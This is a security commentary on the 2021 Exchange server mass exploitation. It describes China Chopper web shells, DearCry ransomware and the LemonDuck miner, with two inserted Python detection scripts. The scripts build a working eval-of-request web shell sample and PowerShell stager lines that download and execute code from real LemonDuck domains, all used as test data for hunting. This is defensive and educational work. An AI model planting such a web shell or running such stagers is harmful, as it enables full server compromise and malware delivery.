Vulnerabilities / Threats

5/10/2021
10:00 AM
John Hammond
Commentary
Exchange Exploitation: Not Dead Yet

The mass exploitation of Exchange Servers has been a wake-up call, and it will take all parties playing in concert for the industry to react, respond, and recover.

"March Madness" is a jovial nickname for the third month of the year — but in 2021, the cybersecurity industry felt the brunt of March madness for a reason other than basketball: mass exploitation of Microsoft Exchange Servers. Almost two months later, we're still living in the aftermath of this widespread incident.


On March 1, Huntress learned about new vulnerabilities that gave an unauthenticated attacker full control of a Microsoft Exchange server. These vulnerabilities had not yet been disclosed, but enterprise organizations and small- to medium-sized businesses were already being exploited through them. On March 2, Microsoft released its first security advisory, warning companies about these dangerous vulnerabilities. Unfortunately, Microsoft's initial announcement missed the mark.

Microsoft originally described the activity that came to be dubbed "Exchange Marauder" as "limited and targeted [in scope]," yet practically every supported version of on-premises Exchange was vulnerable, and these servers sit on the open Internet by design. Exchange Online (the cloud service) was not affected; only on-premises installations were susceptible. Soon more than 30,000 organizations in the US alone were known to be affected.

Some experts say attacks using these vulnerabilities began as early as January 6. A successful exploit chained together multiple vulnerabilities to eventually gain remote code execution (RCE) on the target host by dropping a "Web shell" in a publicly accessible location. These Web shells were small files that the server itself would process and evaluate as code, allowing anyone who knew the specific key or parameter name to run commands and fully control the machine with the privileges of the Exchange Web process, which runs as SYSTEM.

The early days of the month were filled with chaos and uncertainty. It was difficult to determine whether the initial patches Microsoft released had actually taken effect, and patching closed only the entry point: if a Web shell was already present, you were already compromised, and the patch did nothing to remove it. The cybersecurity industry got scrappy: We were notifying individuals through Reddit, doing threat hunting and intelligence on Twitter, sharing indicators of compromise on GitHub and Pastebin ... whatever was the fastest method to disseminate information.

While the industry was screaming from the rooftops to patch, patch, patch, we also wanted to contribute to the threat intelligence and help inform organizations of potential indicators of compromise (IoCs). The most blatant IoC is a Web shell itself. These Web shells follow the structure of a "China Chopper," a nickname given to a style of simple, minimalist syntax that evaluates, as code, a command supplied as part of the Web request.

These have typically been found in the C:\inetpub\wwwroot\aspnet_client directory or its subdirectories, with unfamiliar or random filenames and a .aspx extension. (We have seen a large number of variations on these Web shells and have been archiving the ones we collect.)

Initially, these Web shells seemed to slip past almost every antivirus (AV), endpoint detection and response (EDR), or preventive security solution.
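The hunt described above, as an added example that is not Huntress' or Microsoft's code: a scanner that walks a Web root for .aspx files and flags the traits of the minimal China Chopper syntax (server-side script, eval() of a request parameter, the "unsafe" eval mode), recording the modification time so each hit can be placed on a timeline. The Web root, the benign page, the shell file and its random-looking name and parameter name are all constructed in a temporary directory so the scanner runs offline; on a live server you would point scan_webroot at C:\inetpub\wwwroot or an exported copy.

```python
"""Hunt for China Chopper-style ASPX web shells under an IIS web root.

Added example, not code from the article or from Huntress. The sample tree
is constructed in a temp directory; the shell it contains is only the
syntax pattern being hunted, with a placeholder parameter name.
"""
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Traits of the minimal China Chopper syntax: code that runs server side and
# eval()s whatever arrives in a request parameter. Case-insensitive because
# ASP.NET markup and JScript are.
INDICATORS = {
    "server_side_script": re.compile(r"runat\s*=\s*[\"']?server", re.I),
    "eval_of_request": re.compile(r"\beval\s*\(\s*Request(?:\.Item)?\s*[\[(]", re.I),
    "unsafe_eval_mode": re.compile(r"[\"']unsafe[\"']", re.I),
}


def classify(text):
    """Return (suspicious, matched indicator names) for one file's contents."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # eval() of request input is damning on its own (legitimate pages never do
    # it); a lone runat="server" is normal ASP.NET, so otherwise require two.
    suspicious = "eval_of_request" in hits or len(hits) >= 2
    return suspicious, hits


def scan_webroot(root, suffix=".aspx"):
    """Walk the web root and return one finding per suspicious file."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob(f"*{suffix}")):
        suspicious, hits = classify(path.read_text(errors="replace"))
        if not suspicious:
            continue
        st = path.stat()
        findings.append({
            "path": path.relative_to(root).as_posix(),
            "size": st.st_size,
            # mtime is the first timeline anchor for "when were we compromised"
            "modified": datetime.fromtimestamp(st.st_mtime, timezone.utc)
                                .isoformat(timespec="seconds"),
            "indicators": hits,
        })
    return findings


def build_sample_webroot():
    """Constructed sample tree: one benign OWA page, one China Chopper-style shell."""
    root = Path(tempfile.mkdtemp(prefix="wwwroot-"))
    benign = root / "owa" / "auth" / "logon.aspx"
    benign.parent.mkdir(parents=True)
    # Ordinary ASP.NET: runat="server" alone must not be reported.
    benign.write_text('<%@ Page Language="C#" %>\n'
                      '<html><body><form runat="server">Sign in</form></body></html>\n')
    # Random-looking filename (constructed) in the directory the article names.
    shell = root / "aspnet_client" / "system_web" / "Ab9xQ3.aspx"
    shell.parent.mkdir(parents=True)
    shell.write_text('<script language="JScript" runat="server">'
                     'function Page_Load(){eval(Request["SECRET_PARAM"],"unsafe");}'
                     '</script>\n')
    return root


if __name__ == "__main__":
    for f in scan_webroot(build_sample_webroot()):
        print(f"{f['modified']}  {f['size']:>6}  {f['path']}  {','.join(f['indicators'])}")
```

Treat every hit as a confirmed compromise rather than a false positive until proven otherwise: the file's modification time, the IIS logs for requests to that path, and the process tree under the IIS worker process are the next things to pull.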

An excerpt of our inventoried Web shells, indicating the filename, when it was modified, and preventive security software installed on the host. The timestamps indicated in red are our earliest identified compromise, days before the initial reporting from Microsoft. Credit: Huntress

Prevention is hard. By now, just about every AV and EDR product detects these shells. It does show, however, that this small, simple syntax slipped by and shook up the industry.

After the Web shell is in place and the threat actors have gained access, the question becomes "what will they do next?" What becomes of these targets and victims after the compromise? While the hackers have complete administrative access, they could drop ransomware, farm this machine into a botnet, deface the victim's websites, steal and sell data … anything they would like.

We have since seen indicators of ransomware targeting these compromised Exchange Servers dubbed "DearCry." DearCry uses both AES and RSA cryptography and leaves files encrypted with a "DEARCRY!" header at the top of the file contents.

Surprisingly, evidence of cryptocurrency miners is more common than ransomware. An old family of cryptomining malware, "LemonDuck," has reemerged.

LemonDuck hides through multiple obfuscated payloads but uses RSA to validate each stage. While there are many domains and IoCs associated with LemonDuck, the most frequent that Huntress has seen as recently as March has been the http[:]//t[.]zker9[.]com and http[:]//t[.]zz3r0[.]com domains.

A persistent foothold of LemonDuck uses PowerShell to download another stager, validating it with RSA.

A clever trick that stagers like this use is appending the current date or time as a query-string parameter when requesting data from an external server. Because the URL differs on every request, it defeats HTTP caching and ensures the content received is always the latest copy.

The downloaded code is then executed with "fileless malware" techniques using the IEX syntax, a PowerShell alias for "Invoke-Expression" that evaluates code on the fly. The next layer of code it pulls down runs yet another stager in memory, which is obfuscated by using reversed strings. All of these techniques are attempts for this malware to remain undetected by automated solutions or AV/EDR products.

After six stages of obfuscation, we see the raw source code of this LemonDuck malware written in PowerShell. It checks the victim's architecture, detects the processor type, and downloads the appropriate mining software. LemonDuck installs its own persistence so it continues to run after a reboot, and it throttles the computer's resources to maximize the attacker's mining income.
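The stager tradecraft described in the preceding paragraphs (IEX of a downloaded string, a date-based cache-buster, a reversed-string layer, the two domains named above), as an added triage example that is not LemonDuck's code and not a Huntress tool. It takes a PowerShell script block as logged by script block logging, reverses every string literal to peel the reversed-string layer, and reports which traits are present and which hosts are contacted. The three script blocks are constructed to mimic those traits; they are not real LemonDuck samples, and the regexes are assumptions about the idioms, not signatures from any vendor.

```python
"""Triage PowerShell script blocks for LemonDuck-style stager tradecraft.

Added example, not LemonDuck's code and not a Huntress tool. STAGE1, STAGE2
and BENIGN are constructed inputs; t.zker9.com and t.zz3r0.com are the IoC
domains from the article.
"""
import re
from urllib.parse import urlparse

# One regex per trait. PowerShell is case-insensitive, so matching is too.
TRAITS = {
    "iex": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download_string": re.compile(r"\.DownloadString\s*\(", re.I),
    # URL ending in ? or & concatenated with the current date/time (cache-buster)
    "cache_buster": re.compile(r"[?&]['\"]?\s*\+\s*\(?\s*(?:Get-Date|\[datetime\])", re.I),
    # idiomatic PowerShell string reversal used between stages
    "reversed_string": re.compile(r"\[-1\.\.-\(\$\w+\.Length\)\]|\[array\]::Reverse", re.I),
    "known_c2": re.compile(r"\bt\.(?:zker9|zz3r0)\.com\b", re.I),
}
LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")
URL = re.compile(r"https?://[^\s'\"()]+", re.I)


def recover_reversed_literals(script, min_len=16):
    """Reverse each string literal; keep the ones that turn into code or a URL."""
    recovered = []
    for m in LITERAL.finditer(script):
        lit = m.group(1) if m.group(1) is not None else m.group(2)
        if len(lit) < min_len:
            continue
        rev = lit[::-1]
        if (TRAITS["iex"].search(rev) or TRAITS["download_string"].search(rev)
                or URL.search(rev)):
            recovered.append(rev)
    return recovered


def analyze_script_block(script):
    """Return traits, contacted hosts, recovered layers and a verdict."""
    recovered = recover_reversed_literals(script)
    # Scan the raw block plus every peeled layer so a reversed URL still counts.
    text = script + "\n" + "\n".join(recovered)
    traits = {name for name, rx in TRAITS.items() if rx.search(text)}
    hosts = sorted({h for h in (urlparse(u).hostname for u in URL.findall(text)) if h})
    # In-memory execution of something downloaded, or of something from a known
    # C2, is the combination worth paging someone for.
    suspicious = "iex" in traits and bool(traits & {"download_string", "known_c2"})
    return {"traits": traits, "hosts": hosts, "recovered": recovered,
            "suspicious": suspicious}


# Constructed samples (not real malware): a plain stager, a reversed-string
# stager, and a benign admin command that should stay quiet.
STAGE1 = ("$u='http://t.zker9.com/a.jsp?'+(Get-Date).Ticks;"
          "IEX (New-Object Net.WebClient).DownloadString($u)")
STAGE2_PLAIN = '(New-Object Net.WebClient).DownloadString("http://t.zz3r0.com/x?"+(Get-Date).Ticks)'
STAGE2 = "$r='" + STAGE2_PLAIN[::-1] + "';IEX (-join $r[-1..-($r.Length)])"
BENIGN = "Get-ChildItem C:\\inetpub\\wwwroot -Recurse | Where-Object { $_.Extension -eq '.aspx' }"

if __name__ == "__main__":
    for name, block in (("STAGE1", STAGE1), ("STAGE2", STAGE2), ("BENIGN", BENIGN)):
        r = analyze_script_block(block)
        print(name, "SUSPICIOUS" if r["suspicious"] else "clean",
              sorted(r["traits"]), r["hosts"])
```

The point of peeling rather than signature-matching the obfuscated text is that the reversed layer hides both the domain and the download call from a naive string search; only after reversing do the known_c2 and cache_buster traits fire on STAGE2.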

Unfortunately, around 6% of Exchange Servers today have not been patched and are still vulnerable. These exploits can result in a full domain compromise and cannot be taken lightly.

Microsoft has released its April Security Update, disclosing even more critical vulnerabilities in Exchange. As of this writing there are no confirmed reports of these being exploited in the wild, but the impetus to patch should be the same as in March. Two of the new vulnerabilities require neither authentication nor user interaction and ultimately give the attacker RCE. These vulnerabilities are grave and should not be neglected. Threat hunters and security researchers will continue to monitor for any IoCs and share new information as it is released.

We cannot rely on automated solutions alone. Automation is divine, but manual analysis and human investigation are musts. China Chopper Web shells slid under the radar, post-access malware and Trojans continue to bypass defenses with clever obfuscation and evasion techniques — and this research requires context and expertise from security practitioners. While the mass exploitation of Exchange Servers has been a wake-up call, it takes all parties playing in concert for the industry to react, respond, and recover.

John Hammond is a Security Researcher at Huntress as well as a cybersecurity instructor, developer, red teamer, and CTF enthusiast. John is a former Department of Defense Cyber Training Academy curriculum developer and teacher for the Cyber Threat Emulation course, educating ...
 
